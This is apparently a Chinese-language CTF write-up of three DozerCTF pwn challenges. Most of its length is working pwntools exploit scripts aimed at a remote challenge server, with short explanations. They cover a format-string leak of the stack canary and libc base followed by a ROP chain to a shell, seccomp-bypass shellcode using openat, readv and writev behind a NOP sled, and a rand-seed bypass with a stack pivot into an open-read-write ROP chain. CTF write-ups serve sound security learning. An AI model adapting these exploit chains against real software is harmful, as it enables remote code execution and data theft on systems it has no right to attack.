DozerCTF-PWN题解-摩杜云开发者社区

这次比赛一共放了4道pwn题，3道栈上的，比较菜，只会做栈

1.pwn_fclose

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
io = remote('139.196.237.232',32985)
# io = process("./pwn")
libc = ELF("./libc.so.6")
payload = b"%35$p%37$p"
io.sendline(payload)
io.recvuntil(b"Hello ")
canary = int(io.recv(18), 16)
libc_base = int(io.recv(14), 16) - 0x21C87
print(f"libc_base: {hex(libc_base)}")
system = libc_base + libc.symbols["system"]
bin_sh = libc_base + next(libc.search(b"/bin/sh"))
pop_rdi = libc_base + 0x2164f
ret = libc_base + 0x8aa
payload = b"a" * 0xc8 + p64(canary) + b"a" * 8 + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system)
# gdb.attach(io)
io.sendline(payload)
io.interactive()

开了canary和PIE，并且最后clode(1),clode(2)。不过问题不大，printf格式化字符串，泄露canary和libc地址，然后直接栈溢出getshell即可，注意栈平衡。后面就是执行exec 1>&0，就能拿flag了

2.mid_pwn

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

elf = ELF("./pwn")

# openat
shellcode_openat=asm(shellcraft.openat(-100,'./flag'))

shellcode = b"\x90" * 544 + shellcode_openat + asm('''
push 3
    pop rdi
    push 0x1    /* iov size */
    pop rdx
    push 0x100
    lea rbx, [rsp-8]
    push rbx
    mov rsi, rsp
    push SYS_readv
    pop rax
    syscall
    
    push 1
    pop rdi
    push 0x1    /* iov size */
    pop rdx
    push 0x100
    lea rbx, [rsp+8]
    push rbx
    mov rsi, rsp
    push SYS_writev
    pop rax
    syscall
''')

# 运行shellcode
# p = process('./pwn')
p = remote("139.196.237.232", 33035)
# gdb.attach(p)
p.sendline(shellcode)
p.interactive()

禁用了open,read,write和其他特殊函数，例如sendfile之类，所以用openat,readv和writev读取，read到栈上读，不过它生成一个随机数再mod544，所以用nop滑板填充544字节即可
3.ez_pwn(我最想吐槽的

from pwn import *
from ctypes import *
io = remote("139.196.237.232", 33010)
# io = process("./pwn")
context(log_level='debug', arch='amd64', os='linux')
libc1 = CDLL("./libc.so.6")
libc = ELF("./libc.so.6")
elf = ELF("./pwn")
time = libc1.time(0)
pop_rdi = 0x4014d3
pop_rsi_r15 = 0x4014d1
ret = 0x401467
leave = 0x401341
libc1.srand(time)
v4 = libc1.rand()
io.send(b"1" * 0x20)
payload = str(v4).encode()
print(v4)
bss = elf.bss() + 0x200
io.sendline(payload)
# gdb.attach(io)
payload = (b"a" * 0x30 + p64(bss - 0x8) + p64(pop_rdi) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(pop_rdi) + p64(bss)
           + p64(pop_rsi_r15) + p64(0x300) + p64(0) + p64(0x4012F2) + p64(leave))
io.sendline(payload)
io.recvuntil(b"~~\n")
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
# puts_addr=u64(io.recv(14).rjust(8,b'\x00'))
# puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
# io.clean()

pause()
print(hex(puts_addr))
libc_base = puts_addr - libc.sym["puts"]
print(f"libc_base: {hex(libc_base)}")
system = libc_base + libc.sym["system"]
binsh=libc_base + next(libc.search(b"/bin/sh"))
pop_rsi_ret = libc_base + 0x2601f
pop_rax_ret = libc_base + 0x36174
pop_rdx_r12_ret = libc_base + 0x119431
one_gadget = libc_base + 0xe3b04
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]

payload = p64(pop_rdi)
payload += p64(bss + 0x128)
payload += p64(pop_rsi_ret)
payload += p64(0)
payload += p64(open_addr)
payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi_ret)
payload += p64(0x404140)
payload += p64(pop_rdx_r12_ret)
payload += p64(0x100)
payload += p64(0)
payload += p64(read_addr)
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rsi_ret)
payload += p64(0x404140)
payload += p64(pop_rdx_r12_ret)
payload += p64(0x100)
payload += p64(0)
payload += p64(write_addr)
payload += p64(0)*16
payload += b"./flag\x00\x00"
io.send(payload)
io.interactive()

这道题利用了libc的随机数，然后相等能让你进行一次read的溢出获取libc基地址，然后我试过填read的返回地址，结果因为read函数写的地址是由rbp-0x30所决定的，失败了，然后填start重新布局寄存器，却因为无法再次绕过随机数而无法进入栈溢出，然后发现有一个隐藏函数，里面有read，而且我们可以操控它的寄存器的值，所以就想用栈迁移来getshell，结果又不能执行system函数拿到shell，。。。好吧，只能上orw了。感觉这比前面的题难，为什么是ez，难道是我想复杂了？？

第4道题目写的VM，不太了解